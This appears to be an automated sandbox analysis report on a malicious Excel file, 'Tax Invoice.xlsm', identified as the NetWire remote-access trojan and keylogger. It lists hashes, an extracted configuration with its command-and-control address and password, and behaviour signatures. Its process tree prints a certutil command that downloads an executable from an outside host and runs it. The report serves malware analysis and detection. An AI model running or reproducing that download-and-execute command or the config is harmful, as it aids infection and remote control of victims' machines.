Overview

overview

10

Static

static

Tax Invoice.xlsm

windows7-x64

1

Tax Invoice.xlsm

windows10-2004-x64

10

Analysis

  • max time kernel
    135s
  • max time network
    139s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-11-2022 04:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Tax Invoice.xlsm

  • Size

    42KB

  • MD5

    1a5f56600a34c20305f85f2cd0fdfbdf

  • SHA1

    d37b42fd8d23e2fbdaebb55012fd028525e4e72c

  • SHA256

    c0ca12020d7bf51209e7ac026fdfd71f55b97053985b061de24879069c96910c

  • SHA512

    630cf26791900e941843a5e94308031c1e3dab8f60836e395e06f2c0a5fd11bf2beac5115429068276ff9fe1ffdb07d3a49b24029911da8016d490aadcc331d8

  • SSDEEP

    768:IvjsCvCssn3uBIJYfTH+niSpKvDH7Nv+nWhFFiKk/f7qtNhTxRB+nE2g7d:IvDvCT3uG1ByT7Nv+qFFi3/jqLxxyE2g

Score
10/10
netwirebotnetratstealer

Malware Config

Extracted

Family

netwire

C2

212.193.30.230:3345

Attributes
  • activex_autorun

    false

  • copy_executable

    false

  • delete_original

    false

  • host_id

    HostId-%Rand%

  • keylogger_dir

    %AppData%\Logs\

  • lock_executable

    false

  • offline_keylogger

    true

  • password

    Password@9

  • registry_autorun

    false

  • use_mutex

    false

Signatures

  • NetWire RAT payload 4 IoCs
    rat
  • Netwire

    Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.

    botnetstealernetwire
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Tax Invoice.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2636
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c certutil.exe -urlcache -split -f "http://192.3.194.246/ecs.exe" Niipxzvceptnltqinb.exe.exe && Niipxzvceptnltqinb.exe.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:4308
      • C:\Windows\system32\certutil.exe
        certutil.exe -urlcache -split -f "http://192.3.194.246/ecs.exe" Niipxzvceptnltqinb.exe.exe
        3⤵
          PID:2108
        • C:\Users\Admin\Documents\Niipxzvceptnltqinb.exe.exe
          Niipxzvceptnltqinb.exe.exe
          3⤵
          • Executes dropped EXE
          • Checks computer location settings
          • Suspicious use of SetThreadContext
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:5084
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c ping google.com
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4496
            • C:\Windows\SysWOW64\PING.EXE
              ping google.com
              5⤵
              • Runs ping.exe
              PID:1540
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwAA==
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1444
          • C:\Users\Admin\Documents\Niipxzvceptnltqinb.exe.exe
            C:\Users\Admin\Documents\Niipxzvceptnltqinb.exe.exe
            4⤵
            • Executes dropped EXE
            PID:1940

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Credential Access

    Discovery

    Query Registry

    3
    T1012

    System Information Discovery

    4
    T1082

    Remote System Discovery

    1
    T1018

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\Documents\Niipxzvceptnltqinb.exe.exe
      Filesize

      7KB

      MD5

      828988c5e283c07b481aae790b9f1664

      SHA1

      68240ab5ec927d8ee2af027110faee0f2531c828

      SHA256

      44676f7732f4e6adfe2ba94d8e7dbaf4f6bf9d46f81118081f0f3a64f3fcb133

      SHA512

      1a40e9d93a7689a9cce3bc3255b92cc2c9456efc6ebe246dfc6d2a8abeea137cd79469e0565a785bf6f4a2b79559297cf54b1e75d521b8a4df03e4cda6fe0a8d

      Download Submit
    • C:\Users\Admin\Documents\Niipxzvceptnltqinb.exe.exe
      Filesize

      7KB

      MD5

      828988c5e283c07b481aae790b9f1664

      SHA1

      68240ab5ec927d8ee2af027110faee0f2531c828

      SHA256

      44676f7732f4e6adfe2ba94d8e7dbaf4f6bf9d46f81118081f0f3a64f3fcb133

      SHA512

      1a40e9d93a7689a9cce3bc3255b92cc2c9456efc6ebe246dfc6d2a8abeea137cd79469e0565a785bf6f4a2b79559297cf54b1e75d521b8a4df03e4cda6fe0a8d

      Download Submit
    • C:\Users\Admin\Documents\Niipxzvceptnltqinb.exe.exe
      Filesize

      7KB

      MD5

      828988c5e283c07b481aae790b9f1664

      SHA1

      68240ab5ec927d8ee2af027110faee0f2531c828

      SHA256

      44676f7732f4e6adfe2ba94d8e7dbaf4f6bf9d46f81118081f0f3a64f3fcb133

      SHA512

      1a40e9d93a7689a9cce3bc3255b92cc2c9456efc6ebe246dfc6d2a8abeea137cd79469e0565a785bf6f4a2b79559297cf54b1e75d521b8a4df03e4cda6fe0a8d

      Download Submit
    • memory/1444-157-0x0000000007DB0000-0x000000000842A000-memory.dmp
      Filesize

      6.5MB

      Download
    • memory/1444-154-0x0000000005E90000-0x0000000005EF6000-memory.dmp
      Filesize

      408KB

      Download
    • memory/1444-151-0x0000000000000000-mapping.dmp
      Download
    • memory/1444-152-0x0000000004F90000-0x0000000004FC6000-memory.dmp
      Filesize

      216KB

      Download
    • memory/1444-158-0x0000000006A50000-0x0000000006A6A000-memory.dmp
      Filesize

      104KB

      Download
    • memory/1444-153-0x00000000056F0000-0x0000000005D18000-memory.dmp
      Filesize

      6.2MB

      Download
    • memory/1444-156-0x0000000006560000-0x000000000657E000-memory.dmp
      Filesize

      120KB

      Download
    • memory/1444-155-0x0000000005F00000-0x0000000005F66000-memory.dmp
      Filesize

      408KB

      Download
    • memory/1540-149-0x0000000000000000-mapping.dmp
      Download
    • memory/1940-165-0x0000000000400000-0x0000000000433000-memory.dmp
      Filesize

      204KB

      Download
    • memory/1940-164-0x0000000000400000-0x0000000000433000-memory.dmp
      Filesize

      204KB

      Download
    • memory/1940-163-0x0000000000400000-0x0000000000433000-memory.dmp
      Filesize

      204KB

      Download
    • memory/1940-159-0x0000000000000000-mapping.dmp
      Download
    • memory/1940-160-0x0000000000400000-0x0000000000433000-memory.dmp
      Filesize

      204KB

      Download
    • memory/2108-140-0x0000000000000000-mapping.dmp
      Download
    • memory/2636-138-0x00007FF80F3E0000-0x00007FF80F3F0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2636-133-0x00007FF811CF0000-0x00007FF811D00000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2636-134-0x00007FF811CF0000-0x00007FF811D00000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2636-135-0x00007FF811CF0000-0x00007FF811D00000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2636-136-0x00007FF811CF0000-0x00007FF811D00000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2636-137-0x00007FF80F3E0000-0x00007FF80F3F0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2636-132-0x00007FF811CF0000-0x00007FF811D00000-memory.dmp
      Filesize

      64KB

      Download
    • memory/4308-139-0x0000000000000000-mapping.dmp
      Download
    • memory/4496-148-0x0000000000000000-mapping.dmp
      Download
    • memory/5084-146-0x00000000057C0000-0x0000000005852000-memory.dmp
      Filesize

      584KB

      Download
    • memory/5084-141-0x0000000000000000-mapping.dmp
      Download
    • memory/5084-144-0x0000000000D90000-0x0000000000D98000-memory.dmp
      Filesize

      32KB

      Download
    • memory/5084-145-0x0000000005D70000-0x0000000006314000-memory.dmp
      Filesize

      5.6MB

      Download
    • memory/5084-150-0x0000000008970000-0x0000000008992000-memory.dmp
      Filesize

      136KB

      Download
    • memory/5084-147-0x00000000068F0000-0x00000000068FA000-memory.dmp
      Filesize

      40KB

      Download